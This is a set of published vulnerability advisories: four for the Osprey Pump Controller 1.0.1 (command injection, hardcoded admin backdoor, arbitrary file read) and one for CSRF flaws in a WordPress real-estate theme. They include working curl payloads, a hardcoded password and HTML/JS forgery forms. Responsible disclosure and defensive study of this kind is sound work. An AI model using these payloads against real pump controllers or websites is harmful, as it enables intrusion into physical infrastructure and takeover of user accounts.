<pre><code><br />Osprey Pump Controller 1.0.1 (userName) Blind Command Injection<br /><br /><br />Vendor: ProPump and Controls, Inc.<br />Product web page: https://www.propumpservice.com | https://www.pumpstationparts.com<br />Affected version: Software Build ID 20211018, Production 10/18/2021<br /> Mirage App: MirageAppManager, Release [1.0.1]<br /> Mirage Model 1, RetroBoard II<br /><br /><br />Summary: Providing pumping systems and automated controls for<br />golf courses and turf irrigation, municipal water and sewer,<br />biogas, agricultural, and industrial markets. Osprey: door-mounted,<br />irrigation and landscape pump controller.<br /><br />Technology hasn't changed dramatically on pump and electric motors<br />in the last 30 years. Pump station controls are a different story.<br />More than ever before, customers expect the smooth and efficient<br />operation of VFD control. Communications—monitoring, remote control,<br />and interfacing with irrigation computer programs—have become common<br />requirements. Fast and reliable accessibility through cell phones<br />has been a game changer.<br /><br />ProPump & Controls can handle any of your retrofit needs, from upgrading<br />an older relay logic system to a powerful modern PLC controller, to<br />converting your fixed speed or first generation VFD control system to<br />the latest control platform with communications capabilities.<br /><br />We use a variety of solutions, from MCI-Flowtronex and Watertronics<br />package panels to sophisticated SCADA systems capable of controlling<br />and monitoring networks of hundreds of pump stations, valves, tanks,<br />deep wells, or remote flow meters.<br /><br />User friendly system navigation allows quick and easy access to all<br />critical pump station information with no password protection unless<br />requested by the customer. Easy to understand control terminology allows<br />any qualified pump technician the ability to make basic changes without<br />support. Similar control and navigation platform compared to one of the<br />most recognized golf pump station control systems for the last twenty<br />years make it familiar to established golf service groups nationwide.<br />Reliable push button navigation and LCD information screen allows the<br />use of all existing control panel door switches to eliminate the common<br />problems associated with touchscreens.<br /><br />Global system configuration possibilities allow it to be adapted to<br />virtually any PLC or relay logic controlled pump stations being used in<br />the industrial, municipal, agricultural and golf markets that operate<br />variable or fixed speed. On board Wi-Fi and available cellular modem<br />option allows complete remote access.<br /><br />Desc: The pump controller suffers from an unauthenticated OS command<br />injection vulnerability. This can be exploited to inject and execute<br />arbitrary shell commands through the 'userName' HTTP POST parameter<br />called by index.php script.<br /><br />Tested on: Apache/2.4.25 (Raspbian)<br /> Raspbian GNU/Linux 9 (stretch)<br /> GNU/Linux 4.14.79-v7+ (armv7l)<br /> Python 2.7.13 [GCC 6.3.0 20170516]<br /> GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git<br /> PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33)<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research and Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5749<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5749.php<br /><br /><br />05.01.2023<br /><br />--<br /><br /><br />$ curl -s http://TARGET/index.php --data="userName=;sleep%2017&pseudonym=251"<br />HTTP/1.1 200 OK<br /></code></pre>
<pre><code><br />Osprey Pump Controller 1.0.1 (pseudonym) Semi-blind Command Injection<br /><br /><br />Vendor: ProPump and Controls, Inc.<br />Product web page: https://www.propumpservice.com | https://www.pumpstationparts.com<br />Affected version: Software Build ID 20211018, Production 10/18/2021<br /> Mirage App: MirageAppManager, Release [1.0.1]<br /> Mirage Model 1, RetroBoard II<br /><br /><br />Summary: Providing pumping systems and automated controls for<br />golf courses and turf irrigation, municipal water and sewer,<br />biogas, agricultural, and industrial markets. Osprey: door-mounted,<br />irrigation and landscape pump controller.<br /><br />Technology hasn't changed dramatically on pump and electric motors<br />in the last 30 years. Pump station controls are a different story.<br />More than ever before, customers expect the smooth and efficient<br />operation of VFD control. Communications—monitoring, remote control,<br />and interfacing with irrigation computer programs—have become common<br />requirements. Fast and reliable accessibility through cell phones<br />has been a game changer.<br /><br />ProPump & Controls can handle any of your retrofit needs, from upgrading<br />an older relay logic system to a powerful modern PLC controller, to<br />converting your fixed speed or first generation VFD control system to<br />the latest control platform with communications capabilities.<br /><br />We use a variety of solutions, from MCI-Flowtronex and Watertronics<br />package panels to sophisticated SCADA systems capable of controlling<br />and monitoring networks of hundreds of pump stations, valves, tanks,<br />deep wells, or remote flow meters.<br /><br />User friendly system navigation allows quick and easy access to all<br />critical pump station information with no password protection unless<br />requested by the customer. Easy to understand control terminology allows<br />any qualified pump technician the ability to make basic changes without<br />support. Similar control and navigation platform compared to one of the<br />most recognized golf pump station control systems for the last twenty<br />years make it familiar to established golf service groups nationwide.<br />Reliable push button navigation and LCD information screen allows the<br />use of all existing control panel door switches to eliminate the common<br />problems associated with touchscreens.<br /><br />Global system configuration possibilities allow it to be adapted to<br />virtually any PLC or relay logic controlled pump stations being used in<br />the industrial, municipal, agricultural and golf markets that operate<br />variable or fixed speed. On board Wi-Fi and available cellular modem<br />option allows complete remote access.<br /><br />Desc: The pump controller suffers from an unauthenticated OS command<br />injection vulnerability. This can be exploited to inject and execute<br />arbitrary shell commands through the 'pseudonym' HTTP POST parameter<br />called by index.php script.<br /><br />Tested on: Apache/2.4.25 (Raspbian)<br /> Raspbian GNU/Linux 9 (stretch)<br /> GNU/Linux 4.14.79-v7+ (armv7l)<br /> Python 2.7.13 [GCC 6.3.0 20170516]<br /> GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git<br /> PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33)<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research and Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5748<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5748.php<br /><br /><br />05.01.2023<br /><br />--<br /><br /><br />$ curl -s http://TARGET/index.php --data="userName=thricer&pseudonym=%3Bpwd"<br />HTTP/1.1 200 OK<br /><br />$ sleep 3<br />$ #Reflected URL Address Bar: http://TARGET/index.php?userName=thricer&sessionCode=/var/www/html<br /></code></pre>
<pre><code>==== [ Z://USB-00_RESEARCH/WORDPRESS/ ] ============================================= [ 2023 ] ==<br /><br />Report Title: WordPress Real Estate 7 Theme <= 3.3.4 - Multiple Cross-Site Request Forgery (CSRF) Vulnerabilities<br />Google Dork: inurl:/wp-content/themes/realestate-7/<br />Research Date: 2023-02-10<br />Researcher: FearZzZz [ https://fearzzzz.ru ]<br />Component Vendor: Contempo Themes [ https://contempothemes.com ]<br />Vulnerable Version: <= 3.3.4<br />Component Link: https://themeforest.net/item/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme/12473778<br />CVSS Base Score: 6.3 (Medium)<br />CVSS Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L<br />OWASP Top 10: A01: 2021 – Broken Access Control<br />CWE: CWE-352<br />CVE: TBA<br /><br />=================================================================================================<br /><br />#### [ Description: ]<br /><br />The Real Estate 7 theme for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) in versions up to, and including, v3.3.4, because of missing and incorrect nonce validation on several functions. This vulnerability could allow an attacker to trick users into performing an action they didn't intend to perform under their current authentication.<br /><br /><br /><br />#### [ Impact: ]<br /><br />Impact of a CSRF vulnerability is related to the privileges of the target user. Depending on the nature of the action, an attacker might be able to change some data or gain full control over the user's account. If the compromised user has a privileged role (administrator, i.e.) within the application, then the attacker can gain full control over the application.<br /><br /><br /><br />#### [ Proof-of-Concept | Lead Alert Creation: ]<br /><br />```<br /><html><br /> <body><br /> <script>history.pushState('', '', '/')</script><br /> <form action="https://fearzzzz.ru/wp-admin/admin-ajax.php" method="POST"><br /> <input type="hidden" name="action" value="ct_email_cron_onoff" /><br /> <input type="hidden" name="esetting" value="onsms" /><br /> <input type="hidden" name="id" value="12" /><br /> <input type="hidden" name="author_id" value="22" /><br /> <input type="submit" value="Submit request" /><br /> </form><br /> </body><br /></html><br />```<br /><br /><br /><br />#### [ Proof-of-Concept | Add Property to Favorites: ]<br /><br />```<br /><html><br /> <body><br /> <script>history.pushState('', '', '/')</script><br /> <form action="https://fearzzzz.ru/our-properties/our-exclusive-listings/"><br /> <input type="hidden" name="wpfpaction" value="add" /><br /> <input type="hidden" name="postid" value="1005" /><br /> <input type="hidden" name="ajax" value="1" /><br /> <input type="submit" value="Submit request" /><br /> </form><br /> </body><br /></html><br />```<br /><br /><br /><br />#### [ Proof-of-Concept | Remove Property from Favorites: ]<br /><br />```<br /><html><br /> <body><br /> <script>history.pushState('', '', '/')</script><br /> <form action="https://fearzzzz.ru/favorite-listings/"><br /> <input type="hidden" name="wpfpaction" value="remove" /><br /> <input type="hidden" name="page" value="1" /><br /> <input type="hidden" name="postid" value="451" /><br /> <input type="hidden" name="ajax" value="1" /><br /> <input type="submit" value="Submit request" /><br /> </form><br /> </body><br /></html><br />```<br /><br /><br /><br />#### [ Proof-of-Concept | Contact / Information Request: ]<br /><br />```<br /><html><br /> <body><br /> <script>history.pushState('', '', '/')</script><br /> <form action="https://fearzzzz.ru/wp-content/themes/realestate-7/includes/ajax-submit-favorites.php" method="POST"><br /> <input type="hidden" name="ctsubject" value="Fear is Big Business" /><br /> <input type="hidden" name="name" value="FearZzZz" /><br /> <input type="hidden" name="email" value="fearzzzz@tutanota.com" /><br /> <input type="hidden" name="ctphone" value="no" /><br /> <input type="hidden" name="message" value="Fear is Big Business" /><br /> <input type="hidden" name="ctyouremail" value="fearzzzz@tutanota.com" /><br /> <input type="hidden" name="ctproperty" value="https://fearzzzz.ru" /><br /> <input type="submit" value="Submit request" /><br /> </form><br /> </body><br /></html><br />```<br /><br /><br />```<br /><html><br /> <body><br /> <script>history.pushState('', '', '/')</script><br /> <form action="https://fearzzzz.ru/wp-content/themes/realestate-7/includes/ajax-submit-listings.php" method="POST"><br /> <input type="hidden" name="listing_id" value="451" /><br /> <input type="hidden" name="ctsubject" value="Fear is Big Business" /><br /> <input type="hidden" name="name" value="FearZzZz" /><br /> <input type="hidden" name="email" value="fearzzzz@tutanota.com" /><br /> <input type="hidden" name="ctphone" value="" /><br /> <input type="hidden" name="message" value="Fear is Big Business" /><br /> <input type="hidden" name="ctyouremail" value="fearzzzz@tutanota.com" /><br /> <input type="hidden" name="ctproperty" value="Z" /><br /> <input type="hidden" name="ctlistingstreet" value="Z" /><br /> <input type="hidden" name="ctlistingcity" value="Z" /><br /> <input type="hidden" name="ctlistingstate" value="Z" /><br /> <input type="hidden" name="ctlistingzip" value="Z" /><br /> <input type="hidden" name="ctpermalink" value="https://fearzzzz.ru" /><br /> <input type="hidden" name="ctlistingprice" value="Z" /><br /> <input type="hidden" name="ctlistingsqft" value="Z" /><br /> <input type="hidden" name="ctlistingbeds" value="" /><br /> <input type="hidden" name="ctlistingbaths" value="" /><br /> <input type="hidden" name="ctlistinglotsize" value="" /><br /> <input type="hidden" name="ctlistingmlsnumber" value="" /><br /> <input type="hidden" name="ctlistingpropertytype" value="Detached" /><br /> <input type="submit" value="Submit request" /><br /> </form><br /> </body><br /></html><br />```<br /><br /><br /><br />#### [ Proof-of-Concept | Lead Alert Deletion: ]<br /><br />```<br /><html><br /> <body><br /> <script>history.pushState('', '', '/')</script><br /> <form action="https://fearzzzz.ru/wp-admin/admin-ajax.php" method="POST"><br /> <input type="hidden" name="action" value="ct_delete_search" /><br /> <input type="hidden" name="property_id" value="12" /><br /> <input type="submit" value="Submit request" /><br /> </form><br /> </body><br /></html><br />```<br /><br /><br /><br />#### [ Proof-of-Concept | Profile Image Deletion: ]<br /><br />```<br /><html><br /> <body><br /> <script>history.pushState('', '', '/')</script><br /> <form action="https://fearzzzz.ru/wp-admin/admin-ajax.php" method="POST"><br /> <input type="hidden" name="action" value="ct_ajax_delete_profile_img" /><br /> <input type="hidden" name="id" value="1" /><br /> <input type="submit" value="Submit request" /><br /> </form><br /> </body><br /></html><br />```<br /><br /><br /><br />#### [ Proof-of-Concept | Broker Logo Deletion: ]<br /><br />```<br /><html><br /> <body><br /> <script>history.pushState('', '', '/')</script><br /> <form action="https://fearzzzz.ru/wp-admin/admin-ajax.php" method="POST"><br /> <input type="hidden" name="action" value="ct_ajax_delete_broker_logo" /><br /> <input type="hidden" name="id" value="1" /><br /> <input type="submit" value="Submit request" /><br /> </form><br /> </body><br /></html><br />```<br /><br /><br /><br />#### [ Proof-of-Concept | Clear All Favorites: ]<br /><br />```<br /><html><br /> <body><br /> <script>history.pushState('', '', '/')</script><br /> <form action="https://fearzzzz.ru/favorite-listings/"><br /> <input type="hidden" name="wpfpaction" value="clear" /><br /> <input type="hidden" name="ajax" value="1" /><br /> <input type="submit" value="Submit request" /><br /> </form><br /> </body><br /></html><br />```<br /><br /><br /><br />#### [ Proof-of-Concept | Buyer Profile Update: ]<br /><br />```<br /><html><br /> <body><br /> <script>history.pushState('', '', '/')</script><br /> <form action="https://fearzzzz.ru/account-settings/" method="POST" enctype="multipart/form-data"><br /> <input type="hidden" name="first_name" value="" /><br /> <input type="hidden" name="last_name" value="" /><br /> <input type="hidden" name="nickname" value="fearzzzz" /><br /> <input type="hidden" name="display_name" value="FearZzZz" /><br /> <input type="hidden" name="email" value="fearzzzz@tutanota.com" /><br /> <input type="hidden" name="user_url" value="" /><br /> <input type="hidden" name="description" value="" /><br /> <input type="hidden" name="pass1" value="" /><br /> <input type="hidden" name="pass2" value="" /><br /> <input type="hidden" name="twitterhandle" value="" /><br /> <input type="hidden" name="facebookurl" value="" /><br /> <input type="hidden" name="instagramurl" value="" /><br /> <input type="hidden" name="linkedinurl" value="" /><br /> <input type="hidden" name="youtubeurl" value="" /><br /> <input type="hidden" name="mobile" value="" /><br /> <input type="hidden" name="user_additional_phone_1" value="" /><br /> <input type="hidden" name="user_additional_phone_2" value="" /><br /> <input type="hidden" name="user_mailing_address" value="" /><br /> <input type="hidden" name="updateuser" value="Update Profile" /><br /> <input type="hidden" name="_wpnonce" value="0451" /><br /> <input type="hidden" name="_wp_http_referer" value="/account-settings/" /><br /> <input type="hidden" name="action" value="update-user" /><br /> <input type="submit" value="Submit request" /><br /> </form><br /> </body><br /></html><br />```<br /><br /><br /><br />#### [ Proof-of-Concept | Agent Profile Update: ]<br /><br />```<br /><html><br /> <body><br /> <script>history.pushState('', '', '/')</script><br /> <script><br /> function submitRequest()<br /> {<br /> var xhr = new XMLHttpRequest();<br /> xhr.open("POST", "https:\/\/fearzzzz.ru\/account-settings\/", true);<br /> xhr.setRequestHeader("content-type", "multipart\/form-data; boundary=---------------------------333499251812319952534005853646");<br /> xhr.withCredentials = true;<br /> var body = "-----------------------------333499251812319952534005853646\r\n" + <br /> "Content-Disposition: form-data; name=\"first_name\"\r\n" + <br /> "\r\n" + <br /> "Agent\r\n" + <br /> "-----------------------------333499251812319952534005853646\r\n" + <br /> "Content-Disposition: form-data; name=\"last_name\"\r\n" + <br /> "\r\n" + <br /> "Demo\r\n" + <br /> "-----------------------------333499251812319952534005853646\r\n" + <br /> "Content-Disposition: form-data; name=\"nickname\"\r\n" + <br /> "\r\n" + <br /> "agent\r\n" + <br /> "-----------------------------333499251812319952534005853646\r\n" + <br /> "Content-Disposition: form-data; name=\"display_name\"\r\n" + <br /> "\r\n" + <br /> "Demo Agent\r\n" + <br /> "-----------------------------333499251812319952534005853646\r\n" + <br /> "Content-Disposition: form-data; name=\"email\"\r\n" + <br /> "\r\n" + <br /> "agent@email.com\r\n" + <br /> "-----------------------------333499251812319952534005853646\r\n" + <br /> "Content-Disposition: form-data; name=\"user_url\"\r\n" + <br /> "\r\n" + <br /> "\r\n" + <br /> "-----------------------------333499251812319952534005853646\r\n" + <br /> "Content-Disposition: form-data; name=\"description\"\r\n" + <br /> "\r\n" + <br /> "\r\n" + <br /> "-----------------------------333499251812319952534005853646\r\n" + <br /> "Content-Disposition: form-data; name=\"pass1\"\r\n" + <br /> "\r\n" + <br /> "\r\n" + <br /> "-----------------------------333499251812319952534005853646\r\n" + <br /> "Content-Disposition: form-data; name=\"pass2\"\r\n" + <br /> "\r\n" + <br /> "\r\n" + <br /> "-----------------------------333499251812319952534005853646\r\n" + <br /> "Content-Disposition: form-data; name=\"twitterhandle\"\r\n" + <br /> "\r\n" + <br /> "\r\n" + <br /> "-----------------------------333499251812319952534005853646\r\n" + <br /> "Content-Disposition: form-data; name=\"facebookurl\"\r\n" + <br /> "\r\n" + <br /> "\r\n" + <br /> "-----------------------------333499251812319952534005853646\r\n" + <br /> "Content-Disposition: form-data; name=\"instagramurl\"\r\n" + <br /> "\r\n" + <br /> "\r\n" + <br /> "-----------------------------333499251812319952534005853646\r\n" + <br /> "Content-Disposition: form-data; name=\"linkedinurl\"\r\n" + <br /> "\r\n" + <br /> "\r\n" + <br /> "-----------------------------333499251812319952534005853646\r\n" + <br /> "Content-Disposition: form-data; name=\"youtubeurl\"\r\n" + <br /> "\r\n" + <br /> "\r\n" + <br /> "-----------------------------333499251812319952534005853646\r\n" + <br /> "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" + <br /> "\r\n" + <br /> "1024000\r\n" + <br /> "-----------------------------333499251812319952534005853646\r\n" + <br /> "Content-Disposition: form-data; name=\"ct_profile_img\"; filename=\"fearzzzz.jpg\"\r\n" + <br /> "Content-Type: image/jpeg\r\n" + <br /> "\r\n" + <br /> "\r\n" + <br /> "-----------------------------333499251812319952534005853646\r\n" + <br /> "Content-Disposition: form-data; name=\"mobile\"\r\n" + <br /> "\r\n" + <br /> "\r\n" + <br /> "-----------------------------333499251812319952534005853646\r\n" + <br /> "Content-Disposition: form-data; name=\"user_additional_phone_1\"\r\n" + <br /> "\r\n" + <br /> "\r\n" + <br /> "-----------------------------333499251812319952534005853646\r\n" + <br /> "Content-Disposition: form-data; name=\"user_additional_phone_2\"\r\n" + <br /> "\r\n" + <br /> "\r\n" + <br /> "-----------------------------333499251812319952534005853646\r\n" + <br /> "Content-Disposition: form-data; name=\"user_mailing_address\"\r\n" + <br /> "\r\n" + <br /> "\r\n" + <br /> "-----------------------------333499251812319952534005853646\r\n" + <br /> "Content-Disposition: form-data; name=\"fax\"\r\n" + <br /> "\r\n" + <br /> "\r\n" + <br /> "-----------------------------333499251812319952534005853646\r\n" + <br /> "Content-Disposition: form-data; name=\"title\"\r\n" + <br /> "\r\n" + <br /> "\r\n" + <br /> "-----------------------------333499251812319952534005853646\r\n" + <br /> "Content-Disposition: form-data; name=\"tagline\"\r\n" + <br /> "\r\n" + <br /> "\r\n" + <br /> "-----------------------------333499251812319952534005853646\r\n" + <br /> "Content-Disposition: form-data; name=\"agentlicense\"\r\n" + <br /> "\r\n" + <br /> "\r\n" + <br /> "-----------------------------333499251812319952534005853646\r\n" + <br /> "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" + <br /> "\r\n" + <br /> "1024000\r\n" + <br /> "-----------------------------333499251812319952534005853646\r\n" + <br /> "Content-Disposition: form-data; name=\"ct_broker_logo\"; filename=\"fearzzzz.jpg\"\r\n" + <br /> "Content-Type: image/jpeg\r\n" + <br /> "\r\n" + <br /> "\r\n" + <br /> "-----------------------------333499251812319952534005853646\r\n" + <br /> "Content-Disposition: form-data; name=\"brokeragename\"\r\n" + <br /> "\r\n" + <br /> "\r\n" + <br /> "-----------------------------333499251812319952534005853646\r\n" + <br /> "Content-Disposition: form-data; name=\"brokeragelicense\"\r\n" + <br /> "\r\n" + <br /> "\r\n" + <br /> "-----------------------------333499251812319952534005853646\r\n" + <br /> "Content-Disposition: form-data; name=\"office\"\r\n" + <br /> "\r\n" + <br /> "\r\n" + <br /> "-----------------------------333499251812319952534005853646\r\n" + <br /> "Content-Disposition: form-data; name=\"address\"\r\n" + <br /> "\r\n" + <br /> "\r\n" + <br /> "-----------------------------333499251812319952534005853646\r\n" + <br /> "Content-Disposition: form-data; name=\"city\"\r\n" + <br /> "\r\n" + <br /> "\r\n" + <br /> "-----------------------------333499251812319952534005853646\r\n" + <br /> "Content-Disposition: form-data; name=\"state\"\r\n" + <br /> "\r\n" + <br /> "\r\n" + <br /> "-----------------------------333499251812319952534005853646\r\n" + <br /> "Content-Disposition: form-data; name=\"postalcode\"\r\n" + <br /> "\r\n" + <br /> "\r\n" + <br /> "-----------------------------333499251812319952534005853646\r\n" + <br /> "Content-Disposition: form-data; name=\"updateuser\"\r\n" + <br /> "\r\n" + <br /> "Update Profile\r\n" + <br /> "-----------------------------333499251812319952534005853646\r\n" + <br /> "Content-Disposition: form-data; name=\"_wpnonce\"\r\n" + <br /> "\r\n" + <br /> "0451\r\n" + <br /> "-----------------------------333499251812319952534005853646\r\n" + <br /> "Content-Disposition: form-data; name=\"_wp_http_referer\"\r\n" + <br /> "\r\n" + <br /> "/account-settings/\r\n" + <br /> "-----------------------------333499251812319952534005853646\r\n" + <br /> "Content-Disposition: form-data; name=\"action\"\r\n" + <br /> "\r\n" + <br /> "update-user\r\n" + <br /> "-----------------------------333499251812319952534005853646--\r\n";<br /> var aBody = new Uint8Array(body.length);<br /> for (var i = 0; i < aBody.length; i++)<br /> aBody[i] = body.charCodeAt(i); <br /> xhr.send(new Blob([aBody]));<br /> }<br /> </script><br /> <form action="#"><br /> <input type="button" value="Submit request" onclick="submitRequest();" /><br /> </form><br /> </body><br /></html><br />```<br /><br /><br /><br />#### [ Timeline: ]<br /><br />2023.02.08 - Real Estate 7 Theme v3.3.4 released.<br />2023.02.10 - Vulnerability has been discovered.<br />2023.02.15 - Vendor notified.<br />2023.02.16 - Chris Robinson responded that the vulnerabilities have been fixed. The release of the new version v3.3.5 is scheduled for March 6.<br /><br /><br /><br />#### [ Contacts: ]<br /><br />Website: fearzzzz.ru<br />Email: fearzzzz@tutanota.com<br />Twitter: https://twitter.com/fear_zzzz<br />Medium: https://fearzzzz.medium.com<br />GitHub: https://github.com/fearzzzz<br />YouTube: https://youtube.com/@fearzzzz<br /><br /><br /><br />#### [ Notes: ]<br /><br />Special thanks to Chris Robinson (Contempo Themes Founder & CEO) for the quick response and for the respectful communication.<br /><br /><br /><br />#### [ Disclaimer: ]<br /><br />The information provided in this report is provided "as is" without warranty of any kind. FearZzZz disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall FearZzZz be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if FearZzZz have been advised of the possibility of such damages.<br /><br />========================================================================== [ www.fearzzzz.ru ] ==<br /></code></pre>
<pre><code><br />Osprey Pump Controller 1.0.1 Administrator Backdoor Access<br /><br /><br />Vendor: ProPump and Controls, Inc.<br />Product web page: https://www.propumpservice.com | https://www.pumpstationparts.com<br />Affected version: Software Build ID 20211018, Production 10/18/2021<br /> Mirage App: MirageAppManager, Release [1.0.1]<br /> Mirage Model 1, RetroBoard II<br /><br /><br />Summary: Providing pumping systems and automated controls for<br />golf courses and turf irrigation, municipal water and sewer,<br />biogas, agricultural, and industrial markets. Osprey: door-mounted,<br />irrigation and landscape pump controller.<br /><br />Technology hasn't changed dramatically on pump and electric motors<br />in the last 30 years. Pump station controls are a different story.<br />More than ever before, customers expect the smooth and efficient<br />operation of VFD control. Communications—monitoring, remote control,<br />and interfacing with irrigation computer programs—have become common<br />requirements. Fast and reliable accessibility through cell phones<br />has been a game changer.<br /><br />ProPump & Controls can handle any of your retrofit needs, from upgrading<br />an older relay logic system to a powerful modern PLC controller, to<br />converting your fixed speed or first generation VFD control system to<br />the latest control platform with communications capabilities.<br /><br />We use a variety of solutions, from MCI-Flowtronex and Watertronics<br />package panels to sophisticated SCADA systems capable of controlling<br />and monitoring networks of hundreds of pump stations, valves, tanks,<br />deep wells, or remote flow meters.<br /><br />User friendly system navigation allows quick and easy access to all<br />critical pump station information with no password protection unless<br />requested by the customer. Easy to understand control terminology allows<br />any qualified pump technician the ability to make basic changes without<br />support. Similar control and navigation platform compared to one of the<br />most recognized golf pump station control systems for the last twenty<br />years make it familiar to established golf service groups nationwide.<br />Reliable push button navigation and LCD information screen allows the<br />use of all existing control panel door switches to eliminate the common<br />problems associated with touchscreens.<br /><br />Global system configuration possibilities allow it to be adapted to<br />virtually any PLC or relay logic controlled pump stations being used in<br />the industrial, municipal, agricultural and golf markets that operate<br />variable or fixed speed. On board Wi-Fi and available cellular modem<br />option allows complete remote access.<br /><br />Desc: The controller has a hidden administrative account 'admin' that<br />has the hardcoded password 'Mirage1234' that allows full access to the<br />web management interface configuration. The user admin is not visible<br />in Usernames & Passwords menu list (120) of the application and the<br />password cannot be changed through any normal operation of the device.<br />The backdoor lies in the /home/pi/Mirage/Mirage_ValidateSessionCode.x<br />ELF binary.<br /><br />----------------------------------------------------------------------<br />/home/pi/Mirage/Mirage_ValidateSessionCode.x<br />--------------------------------------------<br /> bd = strcmp(userName,"admin");<br /> if (bd == 0) {<br /> userpassWord._0_4_ = 0x6172694d;<br /> userpassWord._4_4_ = 0x32316567;<br /> userpassWord._8_2_ = 0x3433;<br /> userpassWord[10] = '\0';<br /> }<br />----------------------------------------------------------------------<br /><br />Tested on: Apache/2.4.25 (Raspbian)<br /> Raspbian GNU/Linux 9 (stretch)<br /> GNU/Linux 4.14.79-v7+ (armv7l)<br /> Python 2.7.13 [GCC 6.3.0 20170516]<br /> GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git<br /> PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33)<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research and Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5747<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5747.php<br /><br /><br />05.01.2023<br /><br />--<br /><br /><br />$ curl -s http://TARGET/index.php --data="userName=admin&pseudonym=Mirage1234"<br />HTTP/1.1 200 OK<br /><br />$ #Then ** Register Access Menu **<br /></code></pre>
<pre><code><br />Osprey Pump Controller 1.0.1 Unauthenticated File Disclosure<br /><br /><br />Vendor: ProPump and Controls, Inc.<br />Product web page: https://www.propumpservice.com | https://www.pumpstationparts.com<br />Affected version: Software Build ID 20211018, Production 10/18/2021<br /> Mirage App: MirageAppManager, Release [1.0.1]<br /> Mirage Model 1, RetroBoard II<br /><br /><br />Summary: Providing pumping systems and automated controls for<br />golf courses and turf irrigation, municipal water and sewer,<br />biogas, agricultural, and industrial markets. Osprey: door-mounted,<br />irrigation and landscape pump controller.<br /><br />Technology hasn't changed dramatically on pump and electric motors<br />in the last 30 years. Pump station controls are a different story.<br />More than ever before, customers expect the smooth and efficient<br />operation of VFD control. Communications—monitoring, remote control,<br />and interfacing with irrigation computer programs—have become common<br />requirements. Fast and reliable accessibility through cell phones<br />has been a game changer.<br /><br />ProPump & Controls can handle any of your retrofit needs, from upgrading<br />an older relay logic system to a powerful modern PLC controller, to<br />converting your fixed speed or first generation VFD control system to<br />the latest control platform with communications capabilities.<br /><br />We use a variety of solutions, from MCI-Flowtronex and Watertronics<br />package panels to sophisticated SCADA systems capable of controlling<br />and monitoring networks of hundreds of pump stations, valves, tanks,<br />deep wells, or remote flow meters.<br /><br />User friendly system navigation allows quick and easy access to all<br />critical pump station information with no password protection unless<br />requested by the customer. Easy to understand control terminology allows<br />any qualified pump technician the ability to make basic changes without<br />support. Similar control and navigation platform compared to one of the<br />most recognized golf pump station control systems for the last twenty<br />years make it familiar to established golf service groups nationwide.<br />Reliable push button navigation and LCD information screen allows the<br />use of all existing control panel door switches to eliminate the common<br />problems associated with touchscreens.<br /><br />Global system configuration possibilities allow it to be adapted to<br />virtually any PLC or relay logic controlled pump stations being used in<br />the industrial, municipal, agricultural and golf markets that operate<br />variable or fixed speed. On board Wi-Fi and available cellular modem<br />option allows complete remote access.<br /><br />Desc: The controller suffers from an unauthenticated file disclosure<br />vulnerability. Using the 'eventFileSelected' GET parameter, attackers<br />can disclose arbitrary files on the affected device and disclose sensitive<br />and system information.<br /><br />Tested on: Apache/2.4.25 (Raspbian)<br /> Raspbian GNU/Linux 9 (stretch)<br /> GNU/Linux 4.14.79-v7+ (armv7l)<br /> Python 2.7.13 [GCC 6.3.0 20170516]<br /> GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git<br /> PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33)<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research and Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5746<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5746.php<br /><br /><br />05.01.2023<br /><br />--<br /><br /><br />$ curl -s http://TARGET/DataLogView.php?eventFileSelected=/etc/passwd<br /><br />root:x:0:0:root:/root:/bin/bash<br />daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin<br />bin:x:2:2:bin:/bin:/usr/sbin/nologin<br />sys:x:3:3:sys:/dev:/usr/sbin/nologin<br />sync:x:4:65534:sync:/bin:/bin/sync<br />games:x:5:60:games:/usr/games:/usr/sbin/nologin<br />...<br />...<br /></code></pre>
